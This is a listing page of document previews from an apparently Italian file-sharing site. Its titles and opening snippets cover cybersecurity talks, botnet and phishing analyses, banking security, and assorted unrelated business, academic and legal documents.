The OWASP Foundation http://www.owasp.org Secure Banking Expert Community: Unire forze e competenze tecniche per arginare il crimine (sempre più) organizzato" Claudio Santacesaria Head of R&D Rototype -Italy Day2012 Rome, 23 November 2012 Copyright

Dettagli

Esaminiamo ora, più in dettaglio, questi 5 casi. Avv. Maurizio Iorio

Esaminiamo ora, più in dettaglio, questi 5 casi. Avv. Maurizio Iorio Normativa RAEE 2 e normativa sui rifiuti di Pile ed Accumulatori : gli obblighi posti in capo ai Produttori che introducono AEE, Pile e accumulatori in paesi diversi da quelli in cui sono stabiliti Avv.

Dettagli

La Sua banca dovrá registrare il mandato di addebito nei propri sistemi prima di poter iniziare o attivare qualsiasi transazione

La Sua banca dovrá registrare il mandato di addebito nei propri sistemi prima di poter iniziare o attivare qualsiasi transazione To: Agenti che partecipano al BSP Italia Date: 28 Ottobre 2015 Explore Our Products Subject: Addebito diretto SEPA B2B Informazione importante sulla procedura Gentili Agenti, Con riferimento alla procedura

Dettagli

4 6 7 7 8 8 9 10 11 14 15 17 21 25 Riassunto Realizzazione di un Sistema Informativo Territoriale per la sorveglianza sanitaria della fauna nel Parco Nazionale della Majella tramite software Open Source

Dettagli

Mobile Business Treviso, 9 Maggio 2014

Mobile Business Treviso, 9 Maggio 2014 i tuoi dispositivi visti con gli occhi di un hacker Alessio L.R. Pennasilico - apennasilico@clusit.it Mobile Business Treviso, 9 Maggio 2014 $whois -=mayhem=- Security Evangelist @! Committed: AIP Associazione

Dettagli

Operation Bloodninja. Phishing Campaign Analysis Report

Operation Bloodninja. Phishing Campaign Analysis Report Operation Bloodninja Phishing Campaign Analysis Report Sommario Executive Summary... 1 Technical Analysis... 2 Attack Flow... 2 Components Analysis... 4 login_a.php... 4 css.php... 5 wp- config.php...

Dettagli

LINEE GUIDA PER LA SICUREZZA INFORMATICA NELLE PMI

LINEE GUIDA PER LA SICUREZZA INFORMATICA NELLE PMI LINEE GUIDA PER LA SICUREZZA INFORMATICA NELLE PMI Linee guida per la Sicurezza Informatica nelle PMI La presente ricerca costituisce il primo aggiornamento dello studio: La criminalità informatica e i

Dettagli

ACQUISTI PORTALE. Purchasing Portal

ACQUISTI PORTALE. Purchasing Portal ACQUISTI PORTALE Purchasing Portal Il portale acquisti della Mario De Cecco è ideato per: The Mario De Cecco purchase portal is conceived for: - ordinare on line in modo semplice e rapido i prodotti desiderati,

Dettagli

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia Claudio De Paoli IT Security Practice Manager Un approccio innovativo alla sicurezza degli accessi ai servizi di ebanking Roma, gennaio 2011 Cybercrime: Costante aumento di Incidenti e frodi Il mercato

Dettagli

BOTNET: Il caso ZeuS. Theory and Practices from the Scene

BOTNET: Il caso ZeuS. Theory and Practices from the Scene BOTNET: Il caso ZeuS Theory and Practices from the Scene I Malware Si definisce malware un qualsiasi software creato con il solo scopo di causare danni più o meno gravi al computer su cui viene eseguito.

Dettagli

Modello di sicurezza Datocentrico

Modello di sicurezza Datocentrico Modello di sicurezza Datocentrico I dati sono ovunque Chi accede ai dati, a dove accede ai dati e a quali dati accede? Public Cloud Desktop Virtualization Private Cloud Server Virtualization Proteggere

Dettagli

Cybercrime e Forensics Datamatic Sistemi & Servizi DFA OPEN DAY 2015

Cybercrime e Forensics Datamatic Sistemi & Servizi DFA OPEN DAY 2015 Cybercrime e Forensics Datamatic Sistemi & Servizi DFA OPEN DAY 2015 08/07/2015 1 Agenda Cybersecurity Market Chi siamo Cosa facciamo Nuovi trend del Cybersecurity: Moblile, Cloud, Social Demo 08/07/2015

Dettagli

Introduzione Kerberos. Orazio Battaglia

Introduzione Kerberos. Orazio Battaglia Orazio Battaglia Il protocollo Kerberos è stato sviluppato dal MIT (Massachusetts Institute of Tecnology) Iniziato a sviluppare negli anni 80 è stato rilasciato come Open Source nel 1987 ed è diventato

Dettagli

Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla

Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla 1. Which are three reasons a company may choose Linux over Windows as an operating system? (Choose three.)? a) It

Dettagli

WELCOME. Go to the link of the official University of Palermo web site www.unipa.it; Click on the box on the right side Login unico

WELCOME. Go to the link of the official University of Palermo web site www.unipa.it; Click on the box on the right side Login unico WELCOME This is a Step by Step Guide that will help you to register as an Exchange for study student to the University of Palermo. Please, read carefully this guide and prepare all required data and documents.

Dettagli

RELAZIONE SULLA CONGRUITÀ DEL RAPPORTO DI CAMBIO REDATTA PER SANPAOLO IMI S.P.A., AI SENSI DELL ART. 2501-SEXIES CODICE CIVILE, DA

RELAZIONE SULLA CONGRUITÀ DEL RAPPORTO DI CAMBIO REDATTA PER SANPAOLO IMI S.P.A., AI SENSI DELL ART. 2501-SEXIES CODICE CIVILE, DA RELAZIONE SULLA CONGRUITÀ DEL RAPPORTO DI CAMBIO REDATTA PER SANPAOLO IMI S.P.A., AI SENSI DELL ART. 2501-SEXIES CODICE CIVILE, DA PRICEWATERHOUSECOOPERS S.P.A. [QUESTA PAGINA È STATA LASCIATA INTENZIONALMENTE

Dettagli

E-Business Consulting S.r.l.

E-Business Consulting S.r.l. e Rovigo S.r.l. Chi siamo Scenario Chi siamo Missione Plus Offerti Mercato Missionedi riferimento Posizionamento Metodologia Operativa Strategia Comunicazione Digitale Servizi Esempidi consulenza Clienti

Dettagli

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it CMS Hacking Analisi del rischio di utilizzo di applicazioni di terze parti Gabriele Buratti www.isc2chapter-italy.it Agenda Definizione di CMS Rischi e tendenze (e le ragioni di ciò) Attacchi recenti Perchè

Dettagli

On Line Press Agency - Price List 2014

On Line Press Agency - Price List 2014 On Line Press Agency - Price List Partnerships with Il Sole 24 Ore Guida Viaggi, under the brand GVBusiness, is the official publishing contents supplier of Il Sole 24 Ore - Viaggi 24 web edition, more

Dettagli

ATTESTATO DELL ATTIVITÀ DI VOLONTARIATO CERTIFICATE OF VOLUNTARY ACTIVITIES

ATTESTATO DELL ATTIVITÀ DI VOLONTARIATO CERTIFICATE OF VOLUNTARY ACTIVITIES ASSOCIAZIONE CONSORTI DIPENDENTI MINISTERO AFFARI ESTERI ATTESTATO DELL ATTIVITÀ DI VOLONTARIATO CERTIFICATE OF VOLUNTARY ACTIVITIES ASSOCIAZIONE CONSORT I DIPENDENTI MINISTE RO AFFARI ESTER I ATTESTATO

Dettagli

C. & G. Agency Srl Via Novara, snc 01017 Tuscania VT Tel. 0761/096093 Fax. 0761/096106 Website: www.cegagency.it E-mail: info@cegagency.

C. & G. Agency Srl Via Novara, snc 01017 Tuscania VT Tel. 0761/096093 Fax. 0761/096106 Website: www.cegagency.it E-mail: info@cegagency. Servizi Recupero Crediti Debt Collection Services Chi Siamo C. & G. Agency Srl nasce grazie alla pluriennale esperienza maturata nel settore gestione e recupero del credito da parte del socio fondatore.

Dettagli

Copyright 2012 Binary System srl 29122 Piacenza ITALIA Via Coppalati, 6 P.IVA 01614510335 - info@binarysystem.eu http://www.binarysystem.

Copyright 2012 Binary System srl 29122 Piacenza ITALIA Via Coppalati, 6 P.IVA 01614510335 - info@binarysystem.eu http://www.binarysystem. CRWM CRWM (Web Content Relationship Management) has the main features for managing customer relationships from the first contact to after sales. The main functions of the application include: managing

Dettagli

CYBER SECURITY IN CAMPO

CYBER SECURITY IN CAMPO CYBER SECURITY IN CAMPO LA VISIONE ED I SERVIZI FASTWEB PER LE IMPRESE Dario Merletti CONVEGNO CIONet Cuneo 10 Luglio 2015 AGENDA UNO SCENARIO DINAMICO ICT SECURITY: LA VISIONE ED I SERVIZI DI FASTWEB

Dettagli

Security Intelligence e Cloud: la sfida a Botnet, APT e 0-day. Tavola Rotonda - Security Summit Roma 2012

Security Intelligence e Cloud: la sfida a Botnet, APT e 0-day. Tavola Rotonda - Security Summit Roma 2012 Security Intelligence e Cloud: la sfida a Botnet, APT e 0-day Tavola Rotonda - Security Summit Roma 2012 Evento realizzato dal Gruppo LinkedIn Italian Security Professional con il patrocinio di Clusit

Dettagli

GESTIONE IMMOBILIARE REAL ESTATE

GESTIONE IMMOBILIARE REAL ESTATE CONOSCENZA Il Gruppo SCAI ha maturato una lunga esperienza nell ambito della gestione immobiliare. Il know-how acquisito nei differenti segmenti di mercato, ci ha permesso di diventare un riferimento importante

Dettagli

Strategie di sicurezza informatica per la Pubblica Amministrazione

Strategie di sicurezza informatica per la Pubblica Amministrazione Strategie di sicurezza informatica per la Pubblica Amministrazione Dott. Domenico VULPIANI Direttore del Servizio Polizia Postale e delle Comunicazioni Roma, 4 Maggio 2006 LA SOCIETÀ DELL INFORMAZIONE

Dettagli

IP TV and Internet TV

IP TV and Internet TV IP TV e Internet TV Pag. 1 IP TV and Internet TV IP TV e Internet TV Pag. 2 IP TV and Internet TV IPTV (Internet Protocol Television) is the service provided by a system for the distribution of digital

Dettagli

MISSIONE IMPRENDITORIALE A SINGAPORE-

MISSIONE IMPRENDITORIALE A SINGAPORE- MISSIONE IMPRENDITORIALE A SINGAPORE- MISSIONE 20/24 IMPRENDITORIALE OTTOBRE 2012 IN BRASILE- SAN PAOLO 14/17 OTTOBRE 2012 Il Consorzio Camerale per l Internazionalizzazione, la Camera di commercio di

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

THIS DOCUMENT WILL GUIDE YOU STEP BY STEP THROUGH THE DONATION PROCESS RELATED TO THE CROWDFUNDING CAMPAIGN MADE BY STANZE AL GENIO S HOUSE MUSEUM.

THIS DOCUMENT WILL GUIDE YOU STEP BY STEP THROUGH THE DONATION PROCESS RELATED TO THE CROWDFUNDING CAMPAIGN MADE BY STANZE AL GENIO S HOUSE MUSEUM. QUESTO DOCUMENTO TI GUIDA PASSO PASSO NELLA PROCEDURA DI DONAZIONE NELL AMBITO DELLA CAMPAGNA DI RACCOLTA FONDI PROMOSSA DALLA CASA MUSEO STANZE AL GENIO. THIS DOCUMENT WILL GUIDE YOU STEP BY STEP THROUGH

Dettagli

Cybercrime ed evoluzioni: organizedcrime, modelli di business, black market

Cybercrime ed evoluzioni: organizedcrime, modelli di business, black market Cybercrime ed evoluzioni: organizedcrime, modelli di business, black market Raoul «Nobody» Chiesa Founder, Partner, Security Brokers, Inc. Principal, CyberDefcon UK Owner, @ Mediaservice.net Roma, 7 Giugno

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio- CERT Difesa BOLLETTINO DI SICUREZZA INFORMATICA N. 4/2007 Il bollettino può essere visionato

Dettagli

SPACE TECHNOLOGY. Per la creazione d impresa. for business creation. and environmental monitoring. ICT and microelectronics. e monitoraggio ambientale

SPACE TECHNOLOGY. Per la creazione d impresa. for business creation. and environmental monitoring. ICT and microelectronics. e monitoraggio ambientale Green economy e monitoraggio ambientale Green economy and environmental monitoring Navigazione LBS Navigation LBS ICT e microelettronica ICT and microelectronics Per la creazione d impresa SPACE TECHNOLOGY

Dettagli

Sicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Phishing. Sicurezza delle reti.

Sicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Phishing. Sicurezza delle reti. 1 Mattia Lezione XIII: La diffusione del malware Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2012/13 1 cba 2011 13 M.. Creative Commons Attribuzione-Condividi

Dettagli

http://www-5.unipv.it/eduroam/

http://www-5.unipv.it/eduroam/ EduRoam - UniPv http://www-5.unipv.it/eduroam/ Page 1 of 1 30/01/2014 EduRoam è un servizio internazionale che permette l'accesso alla rete wireless agli utenti mobili (roaming users) in tutte le organizzazioni

Dettagli

MISSION TEAM CORPORATE FINANCE BADIALI CONSULTING TAX & COMPANY NETWORK CONTATTI

MISSION TEAM CORPORATE FINANCE BADIALI CONSULTING TAX & COMPANY NETWORK CONTATTI MISSION TEAM BADIALI CONSULTING CORPORATE FINANCE TAX & COMPANY NETWORK CONTATTI MISSION "contribuire al successo dei nostri clienti attraverso servizi di consulenza di alta qualitá" "to contribute to

Dettagli

Cyber Security e Social Networks: Minacce, Rischi e Contromisure. Padova, 10 Settembre 2015

Cyber Security e Social Networks: Minacce, Rischi e Contromisure. Padova, 10 Settembre 2015 Cyber Security e Social Networks: Minacce, Rischi e Contromisure Padova, 10 Settembre 2015 1 Agenda TASSONOMIA DEGLI AGENTI OSTILI E DELLE MINACCE ATTACCHI RECENTI E RELATIVI IMPATTI SCENARI DI RISCHIO

Dettagli

Il Progetto ECCE Un esperienza locale ed europea tra Università e Impresa

Il Progetto ECCE Un esperienza locale ed europea tra Università e Impresa Il Progetto ECCE Un esperienza locale ed europea tra Università e Impresa Giornata Erasmus 2011 Monitoraggio del rapporto Università e Impresa Roma, 17 febbraio 2011 This project has been funded with support

Dettagli

Corsi di Laurea Magistrale/ Master Degree Programs

Corsi di Laurea Magistrale/ Master Degree Programs Corsi di Laurea Magistrale/ Master Degree Programs Studenti iscritti al I anno (immatricolati nell a.a. 2014-2015 / Students enrolled A. Y. 2014-2015) Piano di studi 17-27 Novembre 2014 (tramite web self-service)

Dettagli

Arma dei Carabinieri Raggruppamento CC Investigazioni Scientifiche Reparto Tecnologie Informatiche

Arma dei Carabinieri Raggruppamento CC Investigazioni Scientifiche Reparto Tecnologie Informatiche Arma dei Carabinieri Raggruppamento CC Investigazioni Scientifiche Reparto Tecnologie Informatiche LA SICUREZZA CHE VERRA : scenari futuri e tecnologie emergenti Conferenza Roma, 28 giugno 2012 Sala Conferenze

Dettagli

ANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER E IMPLEMENTAZIONE IN AMBIENTE EMULATO

ANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER E IMPLEMENTAZIONE IN AMBIENTE EMULATO UNIVERSITÀ DEGLI STUDI DI PARMA FACOLTÀ DI INGEGNERIA CORSO DI LAUREA SPECIALISTICA IN INGEGNERIA DELLE TELECOMUNICAZIONI ANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER Relatore: Chiar.mo

Dettagli

Scritto da DEApress Lunedì 14 Aprile 2014 12:03 - Ultimo aggiornamento Martedì 26 Maggio 2015 09:34

Scritto da DEApress Lunedì 14 Aprile 2014 12:03 - Ultimo aggiornamento Martedì 26 Maggio 2015 09:34 This week I have been walking round San Marco and surrounding areas to find things that catch my eye to take pictures of. These pictures were of various things but majority included people. The reason

Dettagli

Informazioni sul Global Internet Security Threat Report di Symantec

Informazioni sul Global Internet Security Threat Report di Symantec Informazioni sul Global Internet Security Threat Report di Symantec Il Global Internet Security Threat Report di Symantec fornisce una panoramica e un analisi delle attività delle minacce di Internet a

Dettagli

TRASFERIMENTO TECNOLOGICO IN UK

TRASFERIMENTO TECNOLOGICO IN UK TRASFERIMENTO TECNOLOGICO IN UK L ESEMPIO DI E-SYNERGY 2 Contenuto Parlerò: dei rischi legati all investimento in aziende start-up delle iniziative del governo britannico per diminuire questi rischi e

Dettagli

Si ricorda che il pagamento è possibile solo tramite CARTE DI CREDITO del circuito VISA VBV (Verified By Visa) o MASTERCARD SECURECODE

Si ricorda che il pagamento è possibile solo tramite CARTE DI CREDITO del circuito VISA VBV (Verified By Visa) o MASTERCARD SECURECODE BENVENUTO WELCOME Dopo aver acconsentito al trattamento dati personali potrai accedere alla procedura di iscrizione online agli eventi messi a disposizione dal Gruppo Cinofilo Fiorentino. Ti consigliamo

Dettagli

L'oro dei nostri giorni. I dati aziendali, i furti, la loro protezione in un ambiente oltre i confini

L'oro dei nostri giorni. I dati aziendali, i furti, la loro protezione in un ambiente oltre i confini L'oro dei nostri giorni. I dati aziendali, i furti, la loro protezione in un ambiente oltre i confini Alessio L.R. Pennasilico - apennasilico@clusit.it Gastone Nencini - gastone_nencini@trendmicro.it Security

Dettagli

Sezione 1 / Section 1. Elementi d identità: il marchio Elements of identity: the logo

Sezione 1 / Section 1. Elementi d identità: il marchio Elements of identity: the logo Sezione 1 / Section 1 2 Elementi d identità: il marchio Elements of identity: the logo Elements of identity: the logo Indice 2.01 Elementi d identità 2.02 Versioni declinabili 2.03 Versioni A e A1, a colori

Dettagli

Ingegneria del Software

Ingegneria del Software Università di Bergamo Facoltà di Ingegneria INGEGNERIA DEL SOFTWARE Paolo Salvaneschi A1_1 V2.2 Ingegneria del Software Il contesto industriale del software Il contenuto del documento è liberamente utilizzabile

Dettagli

IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS)

IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd Lista d imballaggio Guida d installazione rapida FI8904W FI8905WGuida d installazione

Dettagli

A B I. BANCHE E SICUREZZA 2006 Soluzioni, strumenti e metodologie per una nuova strategia di protezione. Roma, 6 e 7 Giugno 2006 Palazzo Altieri 2006

A B I. BANCHE E SICUREZZA 2006 Soluzioni, strumenti e metodologie per una nuova strategia di protezione. Roma, 6 e 7 Giugno 2006 Palazzo Altieri 2006 A B I BANCHE E SICUREZZA 2006 Soluzioni, strumenti e metodologie per una nuova strategia di protezione Roma, 6 e 7 Giugno 2006 Palazzo Altieri 2006 Dr. Alessandro Carini Sezione Crimini Economici Divisione

Dettagli

Protocolli di Sessione TCP/IP: una panoramica

Protocolli di Sessione TCP/IP: una panoramica Protocolli di Sessione TCP/IP: una panoramica Carlo Perassi carlo@linux.it Un breve documento, utile per la presentazione dei principali protocolli di livello Sessione dello stack TCP/IP e dei principali

Dettagli

Get Instant Access to ebook Venditore PDF at Our Huge Library VENDITORE PDF. ==> Download: VENDITORE PDF

Get Instant Access to ebook Venditore PDF at Our Huge Library VENDITORE PDF. ==> Download: VENDITORE PDF VENDITORE PDF ==> Download: VENDITORE PDF VENDITORE PDF - Are you searching for Venditore Books? Now, you will be happy that at this time Venditore PDF is available at our online library. With our complete

Dettagli

CiaoTech S.r.l. (Member of PNO Group)

CiaoTech S.r.l. (Member of PNO Group) CiaoTech S.r.l. (Member of PNO Group) Opportunità di finanziamento europee per la Ricerca e lo Sviluppo - The New EU Framework Programme for Research and Innovation- Horizon 2014-2020 and LIFE opportunities

Dettagli

CI PRENDIAMO C URA DEI TUOI SOGNI.

CI PRENDIAMO C URA DEI TUOI SOGNI. CI PRENDIAMO C URA DEI TUOI SOGNI. We take care of your dreams. Il cuore della nostra attività è la progettazione: per dare vita ai tuoi desideri, formuliamo varie proposte di arredamento su disegni 3D

Dettagli

How to use the WPA2 encrypted connection

How to use the WPA2 encrypted connection How to use the WPA2 encrypted connection At every Alohawifi hotspot you can use the WPA2 Enterprise encrypted connection (the highest security standard for wireless networks nowadays available) simply

Dettagli

Bozza Guida ufficiale vs 1.0

Bozza Guida ufficiale vs 1.0 Bozza Guida ufficiale vs 1.0 Caratteristiche del software Videocopen è un software open source di videoconferenza. Sviluppato in php per la parte web e macromedia flash per la videoconferenza, sfrutta

Dettagli

PIANO DI STUDI. Primo anno di corso

PIANO DI STUDI. Primo anno di corso PIANO DI STUDI Laurea in Economia, commercio internazionale e mercati finanziari (DM 270/04) L-33 Bachelor degree in Italian and in English (2 curricula in English) 1) CURRICULUM: Economia internazionale

Dettagli

Il valore di un processo efficiente di Incident Response: un caso reale

Il valore di un processo efficiente di Incident Response: un caso reale Il valore di un processo efficiente di Incident Response: un caso reale CyberSecurity Summit Milano 9 Aprile,2014 Angelo Colesanto, Pre-Sales System Engineer, RSA 1 Scenario iniziale Primario istituto

Dettagli

PROGETTO parte di Programma Strategico

PROGETTO parte di Programma Strategico ALLEGATO B1 PROGETTO parte di Programma Strategico FORM 1 FORM 1 General information about the project INSTITUTION PRESENTING THE STRATEGIC PROGRAM (DESTINATARIO ISTITUZIONALE PROPONENTE): TITLE OF THE

Dettagli

Cybersecuritye Vulnerabilità dei Sistemi. Settembre 2011 Workshop Sicurezza Energy & Utilities

Cybersecuritye Vulnerabilità dei Sistemi. Settembre 2011 Workshop Sicurezza Energy & Utilities Cybersecuritye Vulnerabilità dei Sistemi SCADA Settembre 2011 Workshop Sicurezza Energy & Utilities Andrea Zapparoli Manzoni Il Clusit www.clusit.it Associazione "no profit" fondata nel 2000 presso l Università

Dettagli

PRESENTAZIONE AZIENDALE ATTIVITA E SERVIZI TECNOLOGIE PERSONALE OBIETTIVI ESPERIENZE

PRESENTAZIONE AZIENDALE ATTIVITA E SERVIZI TECNOLOGIE PERSONALE OBIETTIVI ESPERIENZE PRESENTAZIONE AZIENDALE ABOUT US ATTIVITA E SERVIZI ACTIVITY AND SERVICES TECNOLOGIE TECHNOLOGIES PERSONALE TEAM OBIETTIVI OBJECTIVI ESPERIENZE PRESENTAZIONE AZIENDALE B&G s.r.l. è una società di progettazione

Dettagli

Making the Internet Secure TM

Making the Internet Secure TM Making the Internet Secure TM e-security DAY 3 luglio 2003, Milano Kenneth Udd Senior Sales Manager SSH Communications Security Corp. SSH Communications Security Corp Storia Fondata nel 1995 Ideatrice

Dettagli

www.aylook.com -Fig.1-

www.aylook.com -Fig.1- 1. RAGGIUNGIBILITA DI AYLOOK DA REMOTO La raggiungibilità da remoto di Aylook è gestibile in modo efficace attraverso una normale connessione ADSL. Si presentano, però, almeno due casi: 1.1 Aylook che

Dettagli

Agenda. La protezione della Banca. attraverso la convergenza della Sicurezza Fisica e Logica. innovazione per nuovi progetti

Agenda. La protezione della Banca. attraverso la convergenza della Sicurezza Fisica e Logica. innovazione per nuovi progetti La protezione della Banca attraverso la convergenza della Sicurezza Fisica e Logica Roma, 21-22 Maggio 2007 Mariangela Fagnani (mfagnani@it.ibm.com) ABI Banche e Sicurezza 2007 2007 Corporation Agenda

Dettagli

Tecnologie sicure per la comunicazione globale: una promessa da mantenere per l industria ICT

Tecnologie sicure per la comunicazione globale: una promessa da mantenere per l industria ICT Tecnologie sicure per la comunicazione globale: una promessa da mantenere per l industria ICT Umberto de Julio Italtel, Italtel logo and imss (Italtel Multi-Service Solutions) are registered trademarks

Dettagli

UNIVERSITÀ DEGLI STUDI DI TORINO. Instructions to apply for exams ONLINE Version 01 updated on 17/11/2014

UNIVERSITÀ DEGLI STUDI DI TORINO. Instructions to apply for exams ONLINE Version 01 updated on 17/11/2014 Instructions to apply for exams ONLINE Version 01 updated on 17/11/2014 Didactic offer Incoming students 2014/2015 can take exams of courses scheduled in the a.y. 2014/2015 and offered by the Department

Dettagli

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response Compatibile con diversi Canali di Comunicazione Call Center / Interactive Voice Response ATM PLUS + Certificato digitale Dispositivi Portatili Mutua Autenticazione per E-mail/documenti 46 ,classico richiamo

Dettagli

Customer satisfaction and the development of commercial services

Customer satisfaction and the development of commercial services Customer satisfaction and the development of commercial services Survey 2014 Federica Crudeli San Donato Milanese, 27 May 2014 snamretegas.it Shippers day Snam Rete Gas meets the market 2 Agenda Customer

Dettagli

L AoS avrà validità per l intero periodo anche in caso di interruzione del rapporto tra l'assurer e l assuree.

L AoS avrà validità per l intero periodo anche in caso di interruzione del rapporto tra l'assurer e l assuree. Assurance of Support Alcuni migranti dovranno ottenere una Assurance of Support (AoS) prima che possa essere loro rilasciato il permesso di soggiorno per vivere in Australia. Il Department of Immigration

Dettagli

INFO - NOTE. nella Federazione Russa

INFO - NOTE. nella Federazione Russa INFO - NOTE Informazioni e analisi per gli operatori commerciali italiani nella Federazione Russa In collaborazione con Nuova legge sulla regolamentazione dei collaboratori e la gestione dell out-staffing

Dettagli

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos L Autore Lino Fornaro, Security Consultant Amministratore

Dettagli

Riciclaggio digitale. Documento di sintesi. Analisi delle valute online e del loro uso nel cybercrime

Riciclaggio digitale. Documento di sintesi. Analisi delle valute online e del loro uso nel cybercrime Documento di sintesi Riciclaggio digitale Analisi delle valute online e del loro uso nel cybercrime Di Raj Samani, EMEA, McAfee François Paget e Matthew Hart, McAfee Labs Alcune recenti iniziative delle

Dettagli

We take care of your buildings

We take care of your buildings We take care of your buildings Che cos è il Building Management Il Building Management è una disciplina di derivazione anglosassone, che individua un edificio come un entità che necessita di un insieme

Dettagli

Cyber security e cyber privacy, la sfida dell internet di ogni cosa. Giuseppe Colosimo, Senior Manager Business Line Security NTT DATA Italia

Cyber security e cyber privacy, la sfida dell internet di ogni cosa. Giuseppe Colosimo, Senior Manager Business Line Security NTT DATA Italia Cyber security e cyber privacy, la sfida dell internet di ogni cosa Giuseppe Colosimo, Senior Manager Business Line Security NTT DATA Italia CYBER SECURITY AND CYBER PRIVACY CHALLENGES IN THE INTERNET

Dettagli

INFORMATIVA EMITTENTI N. 18/12

INFORMATIVA EMITTENTI N. 18/12 INFORMATIVA EMITTENTI N. 18/12 Data: 10/02/2012 Ora: 15:05 Mittente: UniCredit S.p.A. Oggetto: Risultati definitivi dell aumento di capitale in opzione agli azionisti ordinari e di risparmio / Final results

Dettagli

Babaoglu 2006 Sicurezza 2

Babaoglu 2006 Sicurezza 2 Key Escrow Key Escrow Ozalp Babaoglu! In many situations, a secret (key) is known to only a single individual " Private key in asymmetric cryptography " The key in symmetric cryptography or MAC where the

Dettagli

In che modo ripagherà l investimento di tempo e di denaro che è stato necessario per crearla e per gestirla?

In che modo ripagherà l investimento di tempo e di denaro che è stato necessario per crearla e per gestirla? Tutti i documenti digitali di questo corso (PDF, MP3, QuickTime, MPEG, eccetera) sono firmati con firma digitale e marcatura temporale ufficiali e sono di proprietà dell'autore. Qualsiasi tentativo di

Dettagli

COMUNICATO STAMPA GRUPPO TELECOM ITALIA: DEFINITO IL NUOVO CALENDARIO DELLE ATTIVITA SOCIETARIE DI TELECOM ITALIA, TIM E TI MEDIA

COMUNICATO STAMPA GRUPPO TELECOM ITALIA: DEFINITO IL NUOVO CALENDARIO DELLE ATTIVITA SOCIETARIE DI TELECOM ITALIA, TIM E TI MEDIA COMUNICATO STAMPA GRUPPO TELECOM ITALIA: DEFINITO IL NUOVO CALENDARIO DELLE ATTIVITA SOCIETARIE DI TELECOM ITALIA, TIM E TI MEDIA Milano, 31 dicembre 2004 Telecom Italia, Tim e Telecom Italia Media comunicano,

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

THINKING DIGITAL SYNCHRONIZING WITH THE FUTURE PENSIERO DIGITALE: SINCRONIZZARSI COL FUTURO

THINKING DIGITAL SYNCHRONIZING WITH THE FUTURE PENSIERO DIGITALE: SINCRONIZZARSI COL FUTURO THINKING DIGITAL SYNCHRONIZING WITH THE FUTURE PENSIERO DIGITALE: SINCRONIZZARSI COL FUTURO A STEP FORWARD IN THE EVOLUTION Projecta Engineering developed in Sassuolo, in constant contact with the most

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8918W Colore: Nera Modello: FI8918W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

La Sicurezza ICT e la difesa del patrimonio informativo

La Sicurezza ICT e la difesa del patrimonio informativo La Sicurezza ICT e la difesa del patrimonio informativo Danilo Bruschi Dip. di Informatica e Comunicazione Università degli Studi di Milano bruschi@dico.unimi.it Argomenti Trattati Un po di storia Le reti

Dettagli

CEPIS e-cb Italy Report. Roberto Bellini (da leggere su www.01net.it )

CEPIS e-cb Italy Report. Roberto Bellini (da leggere su www.01net.it ) CEPIS e-cb Italy Report Roberto Bellini (da leggere su www.01net.it ) Free online selfassessment tool Online services Enables the identification of competences needed for various ICT roles e-cf Competences

Dettagli

DICHIARAZIONE DI RESPONSABILITÀ

DICHIARAZIONE DI RESPONSABILITÀ - 0MNSWK0082LUA - - ITALIANO - DICHIARAZIONE DI RESPONSABILITÀ Il produttore non accetta responsabilità per la perdita di dati, produttività, dispositivi o qualunque altro danno o costo associato (diretto

Dettagli

Asset Management Bond per residenti in Italia

Asset Management Bond per residenti in Italia Asset Management Bond per residenti in Italia Agosto 2013 1 SEB Life International SEB Life International (SEB LI www.seb.ie) società irlandese interamente controllata da SEB Trygg Liv Holding AB, parte

Dettagli

Crimeware e sua evoluzione Come mitigare il fenomeno

